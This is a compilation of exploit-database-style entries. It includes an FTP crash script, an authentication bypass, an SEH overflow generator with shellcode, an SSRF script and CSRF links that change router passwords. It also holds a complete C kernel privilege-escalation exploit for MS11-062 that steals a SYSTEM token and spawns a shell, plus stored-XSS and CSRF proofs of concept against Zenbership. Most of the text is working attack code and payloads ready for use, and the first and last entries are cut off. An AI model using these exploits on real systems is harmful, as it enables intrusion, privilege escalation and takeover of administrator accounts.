# Version: smallftpd 1.0.3
# Tested on: Windows XP, Windows 7 x64
'''
ftp_ip = raw_input("FTP server IP:")
user = raw_input("username:")
password = raw_input("password:")
killercode = 'CRASH' * 100
ftp = FTP(ftp_ip)
ftp.login(user, password)
print ftp.login
print "CRSAH CODE SENT!"
FTP.mkd(ftp, killercode)
# Exploit Title : Boonex Dolphin all versoin <= 7.3 Authentication Bypass
# Exploit Author : Saadat Ullah saadi_linux[@]rocketmail.com
# Software Link : https://www.boonex.com
# Author HomePage : http://security-geeks.blogspot.com
Proof of Concept
File: admin.inc.php
Line: 187
Code: (strcmp($aProfile['Password'], $passwd) != 0)
$passwd is equal to Cookie parameter memberpassword
Bug:
According to PHP documentation strcmp will compare strings, but what if we provide an array???
So, simple bypass is to put two cookies in browser
memberID=1
memberPassword[]=blah --->array
This will allow the attacker to bypass the authentication and can also enter in admin panel.
#Independent Pakistani Security Researcher
#!/usr/bin/python
# -*- coding: utf-8 -*-
### Network Scanner Version 4.0.0.0 - SEH Overflow Exploit by n30m1nd ###
# Date: 2016-10-21
# Exploit Author: n30m1nd
# Exploit Title: Network Scanner Version 4.0.0.0 SEH Based Exploit
# Vendor Homepage: http://www.mitec.cz/
# Software Link: https://www.exploit-db.com/apps/8a419b10772d811ce5eea44cb88ae55b-NetScan.zip
# Version: 4.0.0.0
# Tested on: Win7 64bit and Win10 64 bit
# Credits
# =======
# PoC by: INSECT.B - http://binsect00.tistory.com
# https://www.exploit-db.com/exploits/39447/
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better
# How to
# ======
# * Run this python script. It will generate an "exploit.txt" file.
# * Copy the contents and, in the program, go to the "TOOLS" tab then click on "Detect IP from hostname" and paste the contents
# * MessageBoxA is called on an infinite loop since the exception handler is triggered all the time
# Exploit code
# ============
import struct
# MessageBoxA in NetScan.exe => 004042F1
mbox = (
"\x25\x41\x41\x41"
"\x41\x25\x32\x32"
"\x32\x32\x50\x68"
"\x70\x77\x6E\x64"
"\x54\x5F\x50\x57"
"\x57\x50\x35\x8E"
"\x60\x60\x55\x35"
"\x7F\x22\x20\x55"
"\x50\xC3"
)
# JUMP BACK to our shellcode!
nseh = (
# xor al,51h; Sets the ZF = 0 (We have to be very unlucky for eax to end in 51h)
"\x34\x51"
# jne -32h; Jump if ZF = 0
"\x75\xCC"
)
# pop pop ret => 00402E67
sehh = struct.pack("<L", 0x00402e67)
payl = "A" * (76-48)
payl+= mbox
payl+= "A"*(48-len(mbox))
payl+= nseh + sehh
with open("exploit.txt","wb") as f:
f.write(payl[:-1])
print payl
"""
NOTE:
The original author of this PoC stated that it was not possible to be
exploited since all addresses inside the binary contain the null byte.
As you can see in this exploit, the null byte is added by default at
the end because strings are null terminated when read from an input
box. This is why we write the payload minus 1 byte, payl[:-1], because
we don't need to write the last null byte for the "pop pop ret" jump
in the "sehh" variable.
"""
Title: Industrial Secure Routers - Insecure Configuration Management
Type: Local/Remote
Author: Nassim Asrir
Author Company: HenceForth
Impact: Insecure Configuration Management
Risk: (4/5)
Release Date: 22.10.2016
Summary:
Moxa's EDR series industrial Gigabit-performance secure routers are designed to protect the control networks of critical facilities while maintaining fast data transmissions.
The EDR series security routers provides integrated cyber security solutions that combine industrial firewall, VPN, router, and L2 switching* functions into one product specifically
designed for automation networks,which protects the integrity of remote access and critical devices.
description:
Using this Vulnerability we can change the Admin configuration without knowing Password & Username
Because the form for change the configurations is Insecure.
Vendor:
http://www.moxa.com/product/Industrial_Secure_Routers.htm
Affected Version:
EDR-810, EDR-G902 and EDR-G903
Tested On:
Linux // Dist (Bugtraq 2)
Vendor Status:
I told them and i wait for the answer.
PoC:
- when you navigate the server automatically you redirect to the login page (http://site/login.asp).
- so Just add in the end of URL (admin.htm) then you get the Form to change the Admin configurations.
Credits
Vulnerability discovered by Nassim Asrir - <wassline@gmail.com>
# Exploit Title: EC-CUBE 2.12.6 Server-Side Request Forgery
# Date: 22/10/16
# Exploit Author: Wad Deek
# Vendor Homepage: http://en.ec-cube.net/
# Software Link: http://en.ec-cube.net/download/
# Version: 2.12.6en-p1
# Tested on: Xampp on Windows7
# Fuzzing tool: https://github.com/Trouiller-David/PHP-Source-Code-Analysis-Tools
##
##
#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
require('mechanize')
agent = Mechanize.new()
agent.read_timeout = 3
agent.open_timeout = 3
agent.keep_alive = false
agent.redirect_ok = true
agent.agent.http.verify_mode = OpenSSL::SSL::VERIFY_NONE
#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#===========================
urls = <<URLS
http://localhost/eccube/
URLS
urls.split("\n").each() do |url|
#===========================
#{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{
def get(agent, target)
begin
response = agent.get(target)
code = response.code()
body = response.body()
rescue
else
return code, body
end
end
#{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{
#}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
target = url+"test/api_test.php"
code, body = get(agent, target)
if(code == "200" && body.include?("EC-CUBE API TEST") == true)
begin
response = agent.post(
target,
{
"AccessKeyId" => 4111111111111111,
"arg_key0" => 1,
"arg_key1" => 1,
"arg_key2" => 1,
"arg_key3" => 1,
"arg_key4" => 1,
"arg_key5" => 1,
"arg_key6" => 1,
"arg_key7" => 1,
"arg_key8" => 1,
"arg_key9" => 1,
"arg_val0" => 1,
"arg_val1" => 1,
"arg_val2" => 1,
"arg_val3" => 1,
"arg_val4" => 1,
"arg_val5" => 1,
"arg_val6" => 1,
"arg_val7" => 1,
"arg_val8" => 1,
"arg_val9" => 1,
#????????????????????????????????????????????????????????????
"EndPoint" => "http://www.monip.org/index.php"+"?.jpg",
#????????????????????????????????????????????????????????????
"mode=" => "",
"Operation" => 1,
"SecretKey" => 1,
"Service" => 1,
"Signature" => 1,
"Timestamp" => 1,
"type" => "index.php"
})
body = response.body()
rescue
else
ip = response.body().scan(/IP : (.+?)</).join()
puts("[+] "+target+" >>>> monip.org >>>> "+ip)
end
end
#}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
#===========================
end
#===========================
# Exploit Title: Orange Inventel LiveBox CSRF
# Google Dork: N/A
# Date: 10-24-2016
# Exploit Author: BlackMamba TEAM (BM1)
# Vendor Homepage: N/A
# Version: Inventel - v5.08.3-sp
# Tested on: Windows 7 64bit
# CVE : N/A
# Category: Hardware
1. Description
This Router is vulnerable to Cross Site Request Forgery , a hacker can send a well crafted link or well crafted web page(see the POC) to the administrator.
and thus change the admin password (without the need to know the old one).
this affects the other settings too (SSID name , SSID Security ,enabling disabling the firewall.......).
2. Proof of Concept
this link once clicked the admin password is changed to "blackmamba" (withouth ")
<a href="http://192.168.1.1/configok.cgi?sysPassword=blackmamba">Cats !!!</a>
this link once clicked sets the SSID to "BLACKMAMBA" with the security to NONE (open wirless network)
<a href="http://192.168.1.1/advancedboot.cgi?associateTime=10&wifiEssid=BLACKMAMBA&wifiWep=0">Dogs :D !!!</a>
3. Mitigation
this is kinda obvious but DO NOT click on links you can't verify there origine specialy when connected to the Router's interface.
------------------------------------------------------------------------------------------------------------------------------------------------------------
From the Moroccan team : BLACK MAMBA (by BM1)
/*
################################################################
# Exploit Title: Windows x86 (all versions) NDISTAPI privilege escalation (MS11-062)
# Date: 2016-10-24
# Exploit Author: Tomislav Paskalev
# Vulnerable Software:
# Windows XP SP3 x86
# Windows XP Pro SP2 x64
# Windows Server 2003 SP2 x86
# Windows Server 2003 SP2 x64
# Windows Server 2003 SP2 Itanium-based Systems
# Supported Vulnerable Software:
# Windows XP SP3 x86
# Windows Server 2003 SP2 x86
# Tested Software:
# Windows XP Pro SP3 x86 EN [5.1.2600]
# Windows Server 2003 Ent SP2 EN [5.2.3790]
# CVE ID: 2011-1974
################################################################
# Vulnerability description:
# An elevation of privilege vulnerability exists in the
# NDISTAPI.sys component of the Remote Access Service NDISTAPI
# driver. The vulnerability is caused when the NDISTAPI driver
# improperly validates user-supplied input when passing data
# from user mode to the Windows kernel.
# An attacker must have valid logon credentials and be able to
# log on locally to exploit the vulnerability.
# An attacker who successfully exploited this vulnerability could
# run arbitrary code in kernel mode (i.e. with NT AUTHORITY\SYSTEM
# privileges).
################################################################
# Exploit notes:
# Privileged shell execution:
# - the SYSTEM shell will spawn within the invoking shell/process
# Exploit compiling (Kali GNU/Linux Rolling 64-bit):
# - # i686-w64-mingw32-gcc MS11-062.c -o MS11-062.exe -lws2_32
# Exploit prerequisites:
# - low privilege access to the target OS
# - target OS not patched (KB2566454)
# - Remote Access Service (RAS) running
# - sc query remoteaccess
# - sc start remoteaccess
################################################################
# Patches:
# Windows XP SP3 x86
# WindowsXP-KB2566454-x86-enu.exe
# (not available - EoL)
# Windows Server 2003 SP2 x86
# WindowsServer2003-KB2566454-x86-enu.exe
# https://www.microsoft.com/en-us/download/details.aspx?id=27093
################################################################
# Thanks to:
# Ni Tao (writeup)
# Google Translate (Chinese -> Engrish)
################################################################
# References:
# https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1974
# https://technet.microsoft.com/en-us/library/security/ms11-062.aspx
# http://www.cas.stc.sh.cn/jsjyup/pdf/2015/5/%E5%9F%BA%E4%BA%8E%E9%9D%99%E6%80%81%E6%B1%A1%E7%82%B9%E5%88%86%E6%9E%90%E6%8A%80%E6%9C%AF%E7%9A%84%E8%BD%AF%E4%BB%B6%E5%86%85%E6%A0%B8%E9%A9%B1%E5%8A%A8%E5%AE%89%E5%85%A8%E6%80%A7%E6%A3%80%E6%B5%8B.pdf
# https://translate.google.com/
################################################################
*/
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <ws2tcpip.h>
#pragma comment (lib, "ws2_32.lib")
////////////////////////////////////////////////////////////////
// DEFINE DATA TYPES
////////////////////////////////////////////////////////////////
typedef enum _KPROFILE_SOURCE {
ProfileTime,
ProfileAlignmentFixup,
ProfileTotalIssues,
ProfilePipelineDry,
ProfileLoadInstructions,
ProfilePipelineFrozen,
ProfileBranchInstructions,
ProfileTotalNonissues,
ProfileDcacheMisses,
ProfileIcacheMisses,
ProfileCacheMisses,
ProfileBranchMispredictions,
ProfileStoreInstructions,
ProfileFpInstructions,
ProfileIntegerInstructions,
Profile2Issue,
Profile3Issue,
Profile4Issue,
ProfileSpecialInstructions,
ProfileTotalCycles,
ProfileIcacheIssues,
ProfileDcacheAccesses,
ProfileMemoryBarrierCycles,
ProfileLoadLinkedIssues,
ProfileMaximum
} KPROFILE_SOURCE, *PKPROFILE_SOURCE;
typedef DWORD (WINAPI *PNTQUERYINTERVAL) (
KPROFILE_SOURCE ProfileSource,
PULONG Interval
);
typedef LONG NTSTATUS;
typedef NTSTATUS (WINAPI *PNTALLOCATE) (
HANDLE ProcessHandle,
PVOID *BaseAddress,
ULONG ZeroBits,
PULONG RegionSize,
ULONG AllocationType,
ULONG Protect
);
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG Reserved[2];
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT Unknown;
USHORT LoadCount;
USHORT ModuleNameOffset;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef BOOL (WINAPI *LPFN_ISWOW64PROCESS) (HANDLE, PBOOL);
////////////////////////////////////////////////////////////////
// FUNCTIONS
////////////////////////////////////////////////////////////////
BOOL IsWow64()
{
BOOL bIsWow64 = FALSE;
LPFN_ISWOW64PROCESS fnIsWow64Process;
fnIsWow64Process = (LPFN_ISWOW64PROCESS) GetProcAddress(GetModuleHandle(TEXT("kernel32")), "IsWow64Process");
if(NULL != fnIsWow64Process)
{
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms684139(v=vs.85).aspx
if (!fnIsWow64Process(GetCurrentProcess(), &bIsWow64))
{
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx
printf(" [-] Failed (error code: %d)\n", GetLastError());
return -1;
}
}
return bIsWow64;
}
////////////////////////////////////////////////////////////////
// MAIN FUNCTION
////////////////////////////////////////////////////////////////
int main(void)
{
printf("[*] MS11-062 (CVE-2011-1974) x86 exploit\n");
printf(" [*] by Tomislav Paskalev\n");
////////////////////////////////////////////////////////////////
// IDENTIFY TARGET OS ARCHITECTURE AND VERSION
////////////////////////////////////////////////////////////////
printf("[*] Identifying OS\n");
// identify target machine's OS architecture
// in case the target machine is running a 64-bit OS
if(IsWow64())
{
printf(" [-] 64-bit\n");
return -1;
}
printf(" [+] 32-bit\n");
// identify target machine's OS version
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms724451(v=vs.85).aspx
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms724832(v=vs.85).aspx
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms724833(v=vs.85).aspx
OSVERSIONINFOEX osvi;
ZeroMemory(&osvi, sizeof(OSVERSIONINFOEX));
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
GetVersionEx((LPOSVERSIONINFO) &osvi);
// define operating system version specific variables
unsigned char shellcode_KPROCESS;
unsigned char shellcode_TOKEN;
unsigned char shellcode_UPID;
unsigned char shellcode_APLINKS;
const char **securityPatchesPtr;
int securityPatchesCount;
////////////////////////////////////////////////////////////////
/*
OS VERSION SPECIFIC OFFSETS
references:
http://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/kthread/original.htm
http://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/kthread/late52.htm
http://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/kthread/current.htm
http://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/eprocess/
*/
////////////////////////////////////////////////////////////////
// in case the OS version is 5.1, service pack 3
if((osvi.dwMajorVersion == 5) && (osvi.dwMinorVersion == 1) && (osvi.wServicePackMajor == 3))
{
// the target machine's OS is Windows XP SP3
printf(" [+] Windows XP SP3\n");
shellcode_KPROCESS = '\x44';
shellcode_TOKEN = '\xC8';
shellcode_UPID = '\x84';
shellcode_APLINKS = '\x88';
const char *securityPatches[] = {"KB2566454"};
securityPatchesPtr = securityPatches;
securityPatchesCount = 1;
}
// in case the OS version is 5.2, service pack 2, not R2
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms724385(v=vs.85).aspx
else if((osvi.dwMajorVersion == 5) && (osvi.dwMinorVersion == 2) && (osvi.wServicePackMajor == 2) && (GetSystemMetrics(89) == 0))
{
// the target machine's OS is Windows Server 2003 SP2
printf(" [+] Windows Server 2003 SP2\n");
shellcode_KPROCESS = '\x38';
shellcode_TOKEN = '\xD8';
shellcode_UPID = '\x94';
shellcode_APLINKS = '\x98';
const char *securityPatches[] = {"KB2566454"};
securityPatchesPtr = securityPatches;
securityPatchesCount = 1;
}
// in case the OS version is not any of the previously checked versions
else
{
// the target machine's OS is an unsupported 32-bit Windows version
printf(" [-] Unsupported version\n");
printf(" [*] Affected 32-bit operating systems\n");
printf(" [*] Windows XP SP3\n");
printf(" [*] Windows Server 2003 SP2\n");
return -1;
}
////////////////////////////////////////////////////////////////
// LOCATE REQUIRED OS COMPONENTS
////////////////////////////////////////////////////////////////
printf("[*] Locating required OS components\n");
// retrieve system information
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms725506(v=vs.85).aspx
// locate "ZwQuerySystemInformation" in the "ntdll.dll" module
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms683212(v=vs.85).aspx
FARPROC ZwQuerySystemInformation;
ZwQuerySystemInformation = GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwQuerySystemInformation");
// 11 = SystemModuleInformation
// http://winformx.florian-rappl.de/html/e6d5d5c1-8d83-199b-004f-8767439c70eb.htm
ULONG systemInformation;
ZwQuerySystemInformation(11, (PVOID) &systemInformation, 0, &systemInformation);
// allocate memory for the list of loaded modules
ULONG *systemInformationBuffer;
systemInformationBuffer = (ULONG *) malloc(systemInformation * sizeof(*systemInformationBuffer));
if(!systemInformationBuffer)
{
printf(" [-] Could not allocate memory");
return -1;
}
// retrieve the list of loaded modules
ZwQuerySystemInformation(11, systemInformationBuffer, systemInformation * sizeof(*systemInformationBuffer), NULL);
// locate "ntkrnlpa.exe" or "ntoskrnl.exe" in the retrieved list of loaded modules
ULONG i;
PVOID targetKrnlMdlBaseAddr;
HMODULE targetKrnlMdlUsrSpcOffs;
BOOL foundModule = FALSE;
PSYSTEM_MODULE_INFORMATION loadedMdlStructPtr;
loadedMdlStructPtr = (PSYSTEM_MODULE_INFORMATION) (systemInformationBuffer + 1);
for(i = 0; i < *systemInformationBuffer; i++)
{
if(strstr(loadedMdlStructPtr[i].ImageName, "ntkrnlpa.exe"))
{
printf(" [+] ntkrnlpa.exe\n");
targetKrnlMdlUsrSpcOffs = LoadLibraryExA("ntkrnlpa.exe", 0, 1);
targetKrnlMdlBaseAddr = loadedMdlStructPtr[i].Base;
foundModule = TRUE;
break;
}
else if(strstr(loadedMdlStructPtr[i].ImageName, "ntoskrnl.exe"))
{
printf(" [+] ntoskrnl.exe\n");
targetKrnlMdlUsrSpcOffs = LoadLibraryExA("ntoskrnl.exe", 0, 1);
targetKrnlMdlBaseAddr = loadedMdlStructPtr[i].Base;
foundModule = TRUE;
break;
}
}
// base address of the loaded module (kernel space)
printf(" [*] Address: %#010x\n", targetKrnlMdlBaseAddr);
// offset address (relative to the parent process) of the loaded module (user space)
printf(" [*] Offset: %#010x\n", targetKrnlMdlUsrSpcOffs);
if(!foundModule)
{
printf(" [-] Could not find ntkrnlpa.exe/ntoskrnl.exe\n");
return -1;
}
// free allocated buffer space
free(systemInformationBuffer);
// determine the address of the "HalDispatchTable" process (kernel space)
// locate the offset fo the "HalDispatchTable" process within the target module (user space)
ULONG_PTR HalDispatchTableUsrSpcOffs;
HalDispatchTableUsrSpcOffs = (ULONG_PTR) GetProcAddress(targetKrnlMdlUsrSpcOffs, "HalDispatchTable");
if(!HalDispatchTableUsrSpcOffs)
{
printf(" [-] Could not find HalDispatchTable\n");
return -1;
}
printf(" [+] HalDispatchTable\n");
printf(" [*] Offset: %#010x\n", HalDispatchTableUsrSpcOffs);
// calculate the address of "HalDispatchTable" in kernel space
// 1. identify the base address of the target module in kernel space
// 2. previous step's result [minus] the load address of the same module in user space
// 3. previous step's result [plus] the address of "HalDispatchTable" in user space
// EQUIVALENT TO:
// 1. determine RVA of HalDispatchTable
// *Relative Virtual Address - the address of an item after it is loaded into memory, with the base address of the image file subtracted from it.
// 2. previous step's result [plus] base address of target module in kernel space
ULONG_PTR HalDispatchTableKrnlSpcAddr;
HalDispatchTableKrnlSpcAddr = HalDispatchTableUsrSpcOffs - (ULONG_PTR) targetKrnlMdlUsrSpcOffs;
HalDispatchTableKrnlSpcAddr += (ULONG_PTR) targetKrnlMdlBaseAddr;
// locate "NtQueryIntervalProfile" in the "ntdll.dll" module
PNTQUERYINTERVAL NtQueryIntervalProfile;
NtQueryIntervalProfile = (PNTQUERYINTERVAL) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile");
if(!NtQueryIntervalProfile)
{
printf(" [-] Could not find NtQueryIntervalProfile\n");
return -1;
}
printf(" [+] NtQueryIntervalProfile\n");
printf(" [*] Address: %#010x\n", NtQueryIntervalProfile);
////////////////////////////////////////////////////////////////
// CREATE TOKEN STEALING SHELLCODE
////////////////////////////////////////////////////////////////
printf("[*] Creating token stealing shellcode\n");
// construct the token stealing shellcode
unsigned char shellcode[] =
{
0x52, // PUSH EDX Save EDX on the stack (save context)
0x53, // PUSH EBX Save EBX on the stack (save context)
0x33,0xC0, // XOR EAX, EAX Zero out EAX (EAX = 0)
0x64,0x8B,0x80,0x24,0x01,0x00,0x00, // MOV EAX, FS:[EAX+0x124] Retrieve current _KTHREAD structure
0x8B,0x40,shellcode_KPROCESS, // MOV EAX, [EAX+_KPROCESS] Retrieve _EPROCESS structure
0x8B,0xC8, // MOV ECX, EAX Copy EAX (_EPROCESS) to ECX
0x8B,0x98,shellcode_TOKEN,0x00,0x00,0x00, // MOV EBX, [EAX+_TOKEN] Retrieve current _TOKEN
0x8B,0x80,shellcode_APLINKS,0x00,0x00,0x00, // MOV EAX, [EAX+_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
0x81,0xE8,shellcode_APLINKS,0x00,0x00,0x00, // SUB EAX, _APLINKS | Retrieve EPROCESS from ActiveProcessLinks
0x81,0xB8,shellcode_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // CMP [EAX+_UPID], 0x4 | Compare UniqueProcessId with 4 (System Process)
0x75,0xE8, // JNZ/JNE ---- Jump if not zero/not equal
0x8B,0x90,shellcode_TOKEN,0x00,0x00,0x00, // MOV EDX, [EAX+_TOKEN] Copy SYSTEM _TOKEN to EDX
0x8B,0xC1, // MOV EAX, ECX Copy ECX (current process _TOKEN) to EAX
0x89,0x90,shellcode_TOKEN,0x00,0x00,0x00, // MOV [EAX+_TOKEN], EDX Copy SYSTEM _TOKEN to current process _TOKEN
0x5B, // POP EBX Pop current stack value to EBX (restore context)
0x5A, // POP EDX Pop current stack value to EDX (restore context)
0xC2,0x08 // RET 8 Return
};
printf(" [*] Shellcode assembled\n");
// allocate memory (RWE permissions) for the shellcode
printf(" [*] Allocating memory\n");
LPVOID shellcodeAddress;
shellcodeAddress = VirtualAlloc(NULL, sizeof(shellcode), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if(shellcodeAddress == NULL)
{
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx
printf(" [-] Failed (error code: %d)\n", GetLastError());
return -1;
}
printf(" [+] Address: %#010x\n", shellcodeAddress);
// copy the shellcode to the allocated memory
memcpy((shellcodeAddress), shellcode, sizeof(shellcode));
printf(" [*] Shellcode copied\n");
////////////////////////////////////////////////////////////////
// EXPLOIT THE VULNERABILITY
////////////////////////////////////////////////////////////////
printf("[*] Exploiting vulnerability\n");
// open the vulnerable device driver
HANDLE targetDeviceHandle;
ULONG dwReturnSize;
int errorCode = 0;
printf(" [*] Opening NDISTAPI device driver\n");
// https://msdn.microsoft.com/en-us/library/windows/desktop/aa363858(v=vs.85).aspx
targetDeviceHandle = CreateFile("\\\\.\\NDISTAPI", GENERIC_READ | GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0);
// in case the function fails
if(targetDeviceHandle == INVALID_HANDLE_VALUE)
{
// the device driver was not opened successfully
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms679360(v=vs.85).aspx
errorCode = GetLastError();
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx
// in case of ERROR_FILE_NOT_FOUND
if(errorCode == 2)
{
// the vulnerable service is not running
printf(" [!] Remote Access Service not started\n");
printf(" [*] run \"sc start remoteaccess\"\n");
return -1;
}
// in case of any other error message
else
{
printf(" [-] Failed (error code: %d)\n", errorCode);
return -1;
}
}
// in case the function succeeds
else
{
// the device driver was opened succesfully
printf(" [+] Done\n");
}
// copy the shellcode address to the input buffer
unsigned char InputBuffer[8]={0};
memcpy((InputBuffer + 4), &shellcodeAddress, sizeof(shellcodeAddress));
// trigger vulnerability (cause arbitrary memory overwrite)
printf(" [*] Calling vulnerable function\n");
if(DeviceIoControl(
targetDeviceHandle,
0x8fff23d4, // DoLineCreateWork
(PVOID) InputBuffer, sizeof(InputBuffer),
(PVOID) (HalDispatchTableKrnlSpcAddr), 0,
&dwReturnSize, NULL
) == 0)
{
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms679360(v=vs.85).aspx
errorCode = GetLastError();
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx
// in case of ERROR_INSUFFICIENT_BUFFER
if(errorCode == 122)
{
// target is patched
printf(" [!] Target patched\n");
printf(" [*] Possible security patches\n");
for(i = 0; i < securityPatchesCount; i++)
printf(" [*] %s\n", securityPatchesPtr[i]);
return -1;
}
// in case of any other error message
else
{
// print the error code
printf(" [-] Failed (error code: %d)\n", errorCode);
return -1;
}
}
else
printf(" [+] Done\n");
// elevate privileges of the current process
printf(" [*] Elevating privileges to SYSTEM\n");
ULONG outInterval = 0;
// https://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FNT%20Objects%2FProfile%2FNtQueryIntervalProfile.html
NtQueryIntervalProfile(2, &outInterval);
printf(" [+] Done\n");
// spawn shell (with elevated privileges)
printf(" [*] Spawning shell\n");
// spawn SYSTEM shell within the current shell (remote shell friendly)
system ("c:\\windows\\system32\\cmd.exe /K cd c:\\windows\\system32");
// exit
printf("\n[*] Exiting SYSTEM shell\n");
return 1;
}
// EoF
1. ADVISORY INFORMATION
========================================
Title: Zenbership (latest version) - Multiple Vulnerabilities
Application: Zenbership
Class: Sensitive Information disclosure
Versions Affected: <= latest version )
Vendor URL: https://www.zenbership.com/
Software URL: https://www.zenbership.com/Download
Bugs: CSRF / Persistent Cross Site Scripting
Date of found: 23.10.2016
Author: Besim
2.CREDIT
========================================
Those vulnerabilities was identified by Besim ALTINOK and Mrs. Meryem AKDOĞAN
3. VERSIONS AFFECTED
========================================
<= latest version
4. TECHNICAL DETAILS & POC
========================================
PR1 - Stored Cross Site Scripting
========================================
1 ) Admin login admin panel
2 ) Create contact form for guest (http://site_name/path/register.php?action=reset&id=3c035c2)
3 ) Attacker enter xss payload to last name input
4 ) XSS Payload run when admin looked contact page (http://site_name/path/admin/index.php?l=contacts)
5 ) Vulnerability Parameter and Payload : &last_name=<Script>alert('ExploitDB')</Script>
## HTTP Request ##
POST /zenbership/pp-functions/form_process.php HTTP/1.1
Host: site_name
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site_name/zenbership/register.php?action=reset&id=3c035c2
Cookie: phpwcmsBELang=en; PHPSESSID=8jvb8kr06gorp07f62hqta9go5; browserupdateorg=pause; __utma=1.252344004.1477173994.1477173994.1477206731.2; __utmc=1; __utmz=1.1477173994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zenseshold=2bdeaefcdc97966f9d8df00752a5cefd; zen_admin_ses=b2d51bb8f8b895f751dee72db8889bce-470476f3e9d2b2b0d3465b82ce6cd889-7ecb9b7770668e2ecd0a049b60576e44; zen_cart=WJL-1484545251; zen_0176e737b450bbd83f5fc1066=253782
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 153
- POST DATA
page=1
&session=zen_0176e737b450bbd83f5fc1066
&first_name=Besim
&last_name=<Script>alert('ExploitDB')</Script>
&email=exploit@yopmail.com
PR2 - CSRF
========================================
1 ) Attacker can add new event with xss payload (stored)
- File : admin/cp-functions/event-add.php
HTTP Request and CSRF PoC
=========================
## HTTP Request ##
POST /zenbership/admin/cp-functions/event-add.php HTTP/1.1
Host: site_name
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://site_name/zenbership/admin/index.php?l=events
Content-Length: 1206
Cookie: phpwcmsBELang=en; PHPSESSID=8jvb8kr06gorp07f62hqta9go5; browserupdateorg=pause; __utma=1.252344004.1477173994.1477173994.1477206731.2; __utmc=1; __utmz=1.1477173994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zenseshold=2bdeaefcdc97966f9d8df00752a5cefd; zen_cart=LKQ-4724862238; zen_admin_ses=b2d51bb8f8b895f751dee72db8889bce-470476f3e9d2b2b0d3465b82ce6cd889-7ecb9b7770668e2ecd0a049b60576e44
Connection: close
- POST DATA
id=JFW996951
&ext=
&edit=0
&event[id]=JFW996951&event[status]=1
&event[name]=<Script>alert('Meryem-ExploitDB');</Script>
&event[tagline]=Meryem&event[description]=<p>Meryem AKDOGAN</p>
&event[post_rsvp_message]=<p>Meryem AKDOGAN</p>
&event[calendar_id]=1
&event[custom_template]=
&tags=
&event[starts]=2016-10-26 00:00:00
&event[ends]=2016-10-28 00:00:00
&event[start_registrations]=2016-10-24 00:00:00
&event[close_registration]=&event[early_bird_end]=
&event[online]=0&event[location_name]=Turkey
&event[url]=&event[address_line_1]=
&event[address_line_2]=&event[city]=
&event[state]=&event[zip]=
&event[country]=
&event[phone]=
&limit_attendees_dud=0
&event[max_rsvps]=
&event[members_only_view]=0
&event[members_only_rsvp]=0
&event[allow_guests]=1
&event[max_guests]=1
&form[col2][Account Overview]=section
&form[col2][company_name]=1
&form[col2][address_line_1]=0
&form[col2][address_line_2]=0
&form[col2][city]=0
&form[col2][state]=0
&form[col2][zip]=0
&form[col2][country]=0
&form[col2][url]=0
## CSRF PoC ##
<html>
<!-- CSRF PoC -->
<body>
<form action="http://site_name/path/admin/cp-functions/event-add.php" method="POST">
<input type="hidden" name="id" value="OXH978786" />
<input type="hidden" name="ext" value="" />
<input type="hidden" name="edit" value="0" />
<input type="hidden" name="event[id]" value="OXH978786" />
<input type="hidden" name="event[status]" value="1" />
<input type="hidden" name="event[name]" value="<script>alert('Meryem-ExploitDB');</Script>" />
<input type="hidden" name="event[tagline]" value="meryem" />
